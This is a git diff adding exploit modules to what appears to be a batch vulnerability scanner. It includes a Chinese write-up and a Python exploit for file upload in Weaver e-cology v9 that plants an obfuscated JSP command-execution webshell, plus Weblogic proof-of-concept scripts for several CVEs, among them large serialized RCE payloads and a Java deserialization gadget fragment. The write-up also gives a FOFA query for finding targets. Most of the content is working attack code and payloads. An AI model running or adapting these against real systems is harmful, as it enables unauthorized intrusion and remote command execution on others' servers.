W$ee$92$7cr$c0$R$e9$b9$G$e5jp$i$e7$da$Y$I$9b$d0$cd$d5$u$D$d0$83$ad$7cj$d8$b6$a8$ac$dc$oN$a7$ec$9f$ebh$u$n$U$N$97$Q9$d4$Tm$M$dd$84Z$82$96$de$aa$f0$ad$a9$E$7dd$5b$J$cd$r$Y$d1$96$SV$8d$f6$S$d7$daKQ$5b$w$i$e3$7bstuE$p$V$89Eb$e1$8a$d2_$88$a6$gc$8d$d1$f6$S$d6H$fdhG$98$a8$e3$a1$e8$da$8c$84$aa1u$h$FM$Utf$C$f8$da$94$f6$3b$ba$8e_G$y$a6$95$b0$ae$84$f5$d7$b0$nz_$J$f7$a7$9ab$8d1$da$7c$e0$S$9a$e5$f3$c1$x$88D7$d2$ee$Vh$87zJx$f8j$90$e3$N$fc$c1$_$81P$c0$c00V$H$b9$hhA$tV$91$c0V$q$d0$86$9d$94$a7$f8$b1q$Q$ed$98$c0$g$98$e8$40$Rkymw$e22$3f$vn$60$3d$ad$c4p$T$eb$f076$E$M$e6$d1L$3b$bf$a0$97$W$Q$e0$92$d8N$8f$hy$c7$ee$c0$a3$e4$3c$c1$9b$7c$t$3f$8bB$b4$7d$B$8fS$W$a6$H$XO$Q$X$a1$9fSx$SO$91$ed$o$G$b1$8b2$95$fe$b6$T$db$c7z$5c$a6$c5$ddx$9a$d5$baI$ad$3dx$86$3e$f6$f2$ff4$c2$b7$f1$xt$V$fd$w$f6$a9$YP1$Y$ac$7c$l$K$d6a$V$cfB$e1$ee6$83$b9$X$ae$n$d8$N$dff$3c$90J$fb$c3T$3a$Qt$cc$c1$ff$A$T$b5l$7e$d7$J$A$A </string> </a> </outer-class> </names> <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'> <parent class='sun.misc.Launcher$ExtClassLoader'> </parent> <package2certs class='hashtable'/> <classes defined-in='java.lang.ClassLoader'/> <defaultDomain> <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/> <principals/> <hasAllPerm>false</hasAllPerm> <staticPermissions>false</staticPermissions> <key> </key> </defaultDomain> <domains class="java.util.Collections$SynchronizedSet" serialization="custom"> <java.util.Collections_-SynchronizedCollection> <default> <c class="set"></c> <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/> </default> </java.util.Collections_-SynchronizedCollection> </domains> <packages/> <nativeLibraries/> <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/> <defaultAssertionStatus>false</defaultAssertionStatus> <classes/> <ignored__packages> <string>java.</string> <string>javax.</string> <string>sun.</string> </ignored__packages> <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'> <__path> <paths/> <class__path>.</class__path> </__path> <__loadedClasses/> </repository> <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/> </processorCL> </iterator> <type>KEYS</type> </e> <in class='java.io.ByteArrayInputStream'> <buf></buf> <pos>0</pos> <mark>0</mark> <count>0</count> </in> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/> </java.util.PriorityQueue> </java.util.PriorityQueue> + 2 + + + '''.format(cmd=cmd) + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url,headers=headers,data=data,verify=False,timeout=5) + if "VulTest" in r.text and r.status_code == 500: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass +if __name__ == '__main__': + target = sys.argv[1] + poc(target) \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_cology_v9_file_upload.md b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.md new file mode 100644 index 0000000..762d863 --- /dev/null +++ b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.md @@ -0,0 +1,94 @@ +# 1、漏洞描述 + + + +泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,可在前台直接getshell,漏洞危害很大,见到路过不要错过。 + +使用fofa可搜索泛微OA相关的系统,不过不一定是存在漏洞的系统,需要尝试; + +``` +app="泛微-协同办公OA" +``` + +# 2、影响范围 + +泛微e-cology v9 + +# 3、漏洞验证 + +## 3.1、漏洞URL + +此漏洞的深度成因暂未做研究,个人理解的是,此处存在上传功能,并且上传压缩包后,会自动解压,而此处文件名包含三层目录结构,则是为了将被压缩文件解压到可访问执行的目录中; + +漏洞的URL如下(重点是URI部分) + +``` +http://x.x.x.x:port/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp +``` + +若页面返回状态码为200,则可能存在漏洞; + +![](images/1.png) + +若页面返回状态码404,则不存在漏洞; + +## 3.2、漏洞验证/利用 + +可使用成型的POC脚本批量验证/利用,也可手动单个验证; + +### 3.2.1、手动验证 + +1. 用本地任意一个上传程序,burpsuit对上传文件的过程抓包; +2. 修改URI、HOST、 POST表单中的name名称(改成file1)、POST表单中的Content-Type(改成图中的格式)、burpsuit中的Target,注意最好删除本地上传抓包内容中存在个人IP的head信息,如origin、refer等; + +![](images/2.jpg) + +1. 按如上步骤修改完成后,发送请求,若页面返回200,然后访问被上传文件的URL,http://x.x.x.x:port/cloudstore/welcome.txt,页面返回文件内容即是存在漏洞。 + + + +POST包(==只用作参考,方便复制一些要修改的地方,还需自己本地抓上传包,因压缩包文件传输存在无法识别的内容,无法直接复制==): + +``` +POST +/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp HTTP/1.1 +Host: x.x.x.x:8001 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------97014110427240678953456189835 +Content-Length: 536 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------97014110427240678953456189835 +Content-Disposition: form-data; name="file1"; filename="welcome.zip" +Content-Type: application/zip + +PK +-----------------------------97014110427240678953456189835 +Content-Disposition: form-data; name="submit" + +ä¸Šä¼ +-----------------------------97014110427240678953456189835-- +``` + +**注意:** + +- 上传的文件必须是个zip压缩文件; + +- 被压缩的文件名要有../../../的三层目录结构,比如../../../test.txt,因Windows文件名不能有/,可先压缩文件,然后用7z解压缩软件打开该压缩包,重命名被压缩的文件,添加上三层目录结构的命名; + +- 不少站是能上传上去,但是访问存在的文件时,会跳转到登陆页面,也就是说只能传,但不能利用; +![](images/3.png) + + +### 3.2.2、脚本EXP验证/利用 + +poc与exp结合,建议先poc验证,结合框架,poc可批量,同时打印poc的url,方便验证; + +exp上传的是个能执行命令的webshell,打印webshell地址,可直接执行命令。 + +![](images/4.png) \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_cology_v9_file_upload.py b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.py new file mode 100644 index 0000000..4d2a211 --- /dev/null +++ b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import zipfile +import io +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='Weaver_e_cology_v9_file_upload' +AUTHOR="境心" +REMARK='泛微OA weaver.common.Ctrl 任意文件上传漏洞' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc_zip(): + poc_name = '../../../test.jsp' + content = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%>""" + mem_string = io.BytesIO() + zfile = zipfile.ZipFile(mem_string, 'w', zipfile.ZIP_DEFLATED, allowZip64=False) + zfile.writestr(poc_name, content) + zfile.close() + mem_string.seek(0) + return mem_string + +def exp_zip(): + exp_name = '../../../test1.jsp' + content = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<%@ page import="sun.misc.BASE64Decoder" %> +<% + if(request.getParameter("cmd")!=null){ + BASE64Decoder decoder = new BASE64Decoder(); + Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU="))); + Process e = (Process) + rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new + String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new + Object[]{}), request.getParameter("cmd") ); + java.io.InputStream in = e.getInputStream(); + int a = -1; + byte[] b = new byte[2048]; + out.print("
");
+        while((a=in.read(b))!=-1){
+            out.println(new String(b));
+        }
+        out.print("
"); + } +%> +""" + mem_string = io.BytesIO() + zfile = zipfile.ZipFile(mem_string, 'w', zipfile.ZIP_DEFLATED, allowZip64=False) + zfile.writestr(exp_name, content) + zfile.close() + mem_string.seek(0) + return mem_string + +def poc(target,exp=None): + result = {} + target_url = target + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp' + if exp == None: + mem_string = poc_zip() + GetShellurl = target + '/cloudstore/test.jsp' + elif exp == "exp": + mem_string = exp_zip() + GetShellurl = target + '/cloudstore/test1.jsp' + file = [('file1', ('test.zip', mem_string.read(), 'application/zip'))] + requests.post(url=target_url,files=file,timeout=5, verify=False) + shell_res = requests.get(url = GetShellurl) + GetShell_res = shell_res.text + GetShell_res_code = shell_res.status_code + if exp == "exp" and GetShell_res_code == 200: + print("webshell地址为: "+GetShellurl) + elif GetShell_res_code == 200 and "this is a friendly test" in GetShell_res: + result['poc_url'] = GetShellurl + result['message'] = "存在任意文件上传漏洞" + result['poc'] = NAME + return result + # print('利用成功webshell地址为:'+GetShellurl) + elif GetShell_res_code == 200 and "this is a friendly test" not in GetShell_res: + result['poc_url'] = GetShellurl + result['message'] = "存在上传漏洞但无法访问文件" + result['poc'] = NAME + return result + +if __name__ == '__main__': + # poc + poc("http://127.0.0.1") + # exp 传的是个能命令执行的webshell,POST传参cmd=命令 + # poc("http://127.0.0.1", "exp") \ No newline at end of file diff --git a/Moudle/Weaver/images/1.png b/Moudle/Weaver/images/1.png new file mode 100644 index 0000000..cf15f6b Binary files /dev/null and b/Moudle/Weaver/images/1.png differ diff --git a/Moudle/Weaver/images/2.jpg b/Moudle/Weaver/images/2.jpg new file mode 100644 index 0000000..0dbc23e Binary files /dev/null and b/Moudle/Weaver/images/2.jpg differ diff --git a/Moudle/Weaver/images/3.png b/Moudle/Weaver/images/3.png new file mode 100644 index 0000000..963f7ee Binary files /dev/null and b/Moudle/Weaver/images/3.png differ diff --git a/Moudle/Weaver/images/4.png b/Moudle/Weaver/images/4.png new file mode 100644 index 0000000..6d05160 Binary files /dev/null and b/Moudle/Weaver/images/4.png differ diff --git a/Moudle/Weblogic/CVE_2014_4210.py b/Moudle/Weblogic/CVE_2014_4210.py new file mode 100644 index 0000000..6dfaf68 --- /dev/null +++ b/Moudle/Weblogic/CVE_2014_4210.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua + + +# 脚本信息 +###################################################### +NAME='CVE_2014_4210' +AUTHOR="Faith" +REMARK='Weblogic SSRF漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result={} + vuln_url = target + "/uddiexplorer/SearchPublicRegistries.jsp" + headers = {"User-Agent":ua} + r = requests.get(vuln_url, headers=headers,verify=False,timeout=3) + try: + if r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = vuln_url + return result + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") diff --git a/Moudle/Weblogic/CVE_2017_10271.py b/Moudle/Weblogic/CVE_2017_10271.py new file mode 100644 index 0000000..2600f3d --- /dev/null +++ b/Moudle/Weblogic/CVE_2017_10271.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='CVE_2017_10271' +AUTHOR = "Faith" +REMARK = 'Weblogic XML Decoder反序列化漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### +def poc(target): + result={} + url = target + '/wls-wsat/CoordinatorPortType' + headers = {"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Upgrade-Insecure-Requests': '1', + 'Content-Type': 'text/xml'} + data = ''' + + + + + + servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt + xmldecoder_vul_test + + + + + + + ''' + r = requests.post(url,headers=headers,data=data,timeout=3) + url1 = target + '/wls-wsat/test.txt' + r1 = requests.get(url1,headers=headers,timeout=3) + try: + if 'xmldecoder_vul_test' in r1.text: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2018_2894.py b/Moudle/Weblogic/CVE_2018_2894.py new file mode 100644 index 0000000..0168e1e --- /dev/null +++ b/Moudle/Weblogic/CVE_2018_2894.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='CVE_2018_2894' +AUTHOR = "Faith" +REMARK = 'Weblogic任意文件上传漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result={} + vuln_url1 = target + '/ws_utc/login.do' + vuln_url2 = target + '/ws_utc/config.do' + headers = {"User-Agent":ua} + r1 = requests.get(vuln_url1,headers=headers,timeout=3) + r2 = requests.get(vuln_url2,headers=headers,timeout=3) + try: + if r1.status_code == 200 and r2.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url1'] = vuln_url1 + result['url2'] = vuln_url2 + return result + elif r1.status_code == 200 and r2.status_code !=200: + result['target'] = target + result['poc'] = NAME + result['url'] = vuln_url1 + return result + elif r1.status_code != 200 and r2.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = vuln_url2 + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2019_2725.py b/Moudle/Weblogic/CVE_2019_2725.py new file mode 100644 index 0000000..f75ab2b --- /dev/null +++ b/Moudle/Weblogic/CVE_2019_2725.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests + + +# 脚本信息 +###################################################### +NAME='CVE_2019_2725' +AUTHOR="RabbitMask" +REMARK='Weblogic RCE' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + + +VUL = ['CVE-2019-2725'] + + +def weblogic_10_3_6(ip): + headers = { + "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type": "text/xml", + "cmd": "%s" % ("whoami") + } + body = """ + + + + oracle.toplink.internal.sessions.UnitOfWorkChangeSet + -84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130973013951051101001011101167811710998101114730149511611497110115108101116731101001011209002195117115101831011141181059910111577101991049711010511510976025959799991011151156912011610111411097108831161211081011151041011011161160187610697118974710897110103478311611410511010359760119597117120671089711511510111511605976991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947114117110116105109101477297115104116979810810159910109598121116101991111001011151160391916691069599108971151151160189176106971189747108971101034767108971151155976059511097109101113012604760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-1011603971081081121171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112001429-54-2-70-66000500-70100303470-727037703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-904076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145941861081051161011149711611111410537699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459107104971101001081011141065769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910108311111711499101701051081011012719710010310111611546106971189712010011704010511211151111151011141059710847112971211081119710011547117116105108477197100103101116115368311611798841149711011510810111680971211081119710010649911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699471141171101161051091014765981151161149799116841149711011510810111610201069711897471051114783101114105971081051229798108101105799111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994784114971101151081011166912099101112116105111110103112111511111510111410597108471129712110811197100115471171161051084771971001031011161151086099108105110105116621016106971189747108971101034784104114101971007042101399117114114101110116841041141019710010204041761069711897471089711010347841041141019710059120440451004304610271191019810811110310599471191111141074769120101991171161018410411410197100704810141031011166711711411410111011687111114107102940417611910198108111103105994711911111410747871111141076510097112116101114591205005110049052104411910198108111103105994711510111411810810111647105110116101114110971084783101114118108101116821011131171011151167310911210870541039910910080561091031011167210197100101114103840761069711897471089711010347831161141051101035941761069711897471089711010347831161141051101035912058059100550601011103101116821011151121111101151011049404176119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011168210111511211111011510173109112108591206206310055064103716675806610451191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111682101115112111110115101731091121087068102011510111667104971149799116101114691109911110010511010310214076106971189747108971101034783116114105110103594186120700711006907210221031011168310111411810810111679117116112117116831161141019710910534041761191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111679117116112117116831161141019710973109112108591207407510069076103511910198108111103105994712010910847117116105108478311611410511010373110112117116831161141019710970781022106971189747108971101034783116114105110103661171021021011147080100810341069711211210111010010444076106971189747108971101034783116114105110103594176106971189747108971101034783116114105110103661171021021011145912083084100810851053258321310808710811611183116114105110103102040417610697118974710897110103478311611410511010359120890901008109112010071100790931049119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011167911711611211711683116114101971097310911210870951011119114105116101831161141019710910244076106971189747105111477311011211711683116114101971095941861209709810096099105102108117115104120101011100960102107111115461109710910180104101610697118974710897110103478312111511610110970106101110310111680114111112101114116121120108059100107010910161069711897471089711010347831161141051101037011110111161117611111910111467971151011201130901001120114103119105110801161089911111011697105110115102740761069711897471089711010347671049711483101113117101110991015941901201180119100112012010171069711897471089711010347821171101161051091017012210101031011168211711011610510910110214041761069711897471089711010347821171101161051091015912012401251001230126107991091003247993280-12810410112010199103940761069711897471089711010347831161141051101035941761069711897471089711010347801141119910111511559120-1260-1251001230-12410114798105110471151043245993280-12210221069711897471051114766117102102101114101100821019710010111470-120102510697118974710511147731101121171168311611410197109821019710010111470-11810171069711897471089711010347801141119910111511570-116101410310111673110112117116831161141019710910234041761069711897471051114773110112117116831161141019710959120-1140-113100-1150-11210424076106971189747105111477311011211711683116114101971095976106971189747108971101034783116114105110103594186120100-110100-1170-10910194076106971189747105111478210197100101114594186120100-107100-1190-10610080-1041081141019710076105110101120-102090100-1190-10110910310111687114105116101114102340417610697118974710511147801141051101168711410511610111459120-990-98100690-97101910697118974710511147801141051101168711410511610111470-95105119114105116101120-93071100-940-9210191069711897471089711010347691209910111211610511111070-901031111171161021761069711897471051114780114105110116831161141019710959120-880-87901070-861019106971189747108971101034784104114111119979810810170-84100-8309110191069711897471051114780114105110116831161141019710970-81107112114105110116108110120-79071100-800-781015112114105110116831169799107841149799101120-76011100-830-751013831169799107779711284979810810110291211151111151011141059710847801191101011145253525156514952505556575750103176121115111115101114105971084780119110101114525352515651495250555657575059033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100047014000120100050150-710001019020020120006300030001-79000201300060100052014000320300010150-710000010210220100010230240202500040102601019027020120007300040001-79000201300060100056014000420400010150-710000010210220100010280290200010300310302500040102608041011010120011140701100118-8903176-72047-64049-74053-640551857-7406177-72047-64049-74053-64055-7406578451867-7407345-74077584254-6907989-6908189-7308244-740861888-74086-74092-73094-740100254-74010318105-7201105852551-91016255-74011518117-740121-10206-89033-720127-6908189-7308218-127-7408644-74086-74092-740-123586-89030-720127-6908189-7308218-121-7408644-74086-74092-740-123586-690-11989-690-11789256-740-1111867-730-108-730-105587158818-103589-89025-6908189-73082259-74086258-74086-74092589257-740-100895881-90-1-3145-740-96259-740-91-890245810-780-852510-740-82-740-772510-740-74-8903-79010940-70-40-89010-7300070093-10109060570112706970967011200229-402670-115-203270-119701127011221-102306057011270697096701120170-8920020320002033017000100102035016091171130126013001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100060014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012609120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120 + + + + """ + url = "%s/wls-wsat/CoordinatorPortType" % (ip) + rsp = requests.post(url, data=body, verify=False, headers=headers) + return rsp.status_code, rsp.text + + +def weblogic_12_1_3(ip): + headers = { + "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type": "text/xml" + } + body = ''' xxxx + + org.slf4j.ext.EventData + + + + + yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7 + + + + + ResultBaseExec + + + + %s + + + + + + + + + + connectionHandler + true + + + + + + + + + + + + + + + + + + + + + + + + + + ''' % ("whoami") + url = "%s/wls-wsat/CoordinatorPortType" % (ip) + rsp = requests.post(url, data=body, verify=False, headers=headers) + return rsp.status_code, rsp.text + + + +def poc(target): + result={} + if weblogic_10_3_6(target)[0] == 200: + result['target'] = target + result['poc'] = NAME + return result + elif weblogic_12_1_3(target)[0] == 200: + result['target'] = target + result['poc'] = NAME + return result + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2020_16882.py b/Moudle/Weblogic/CVE_2020_16882.py new file mode 100644 index 0000000..01b4f9f --- /dev/null +++ b/Moudle/Weblogic/CVE_2020_16882.py @@ -0,0 +1,41 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### 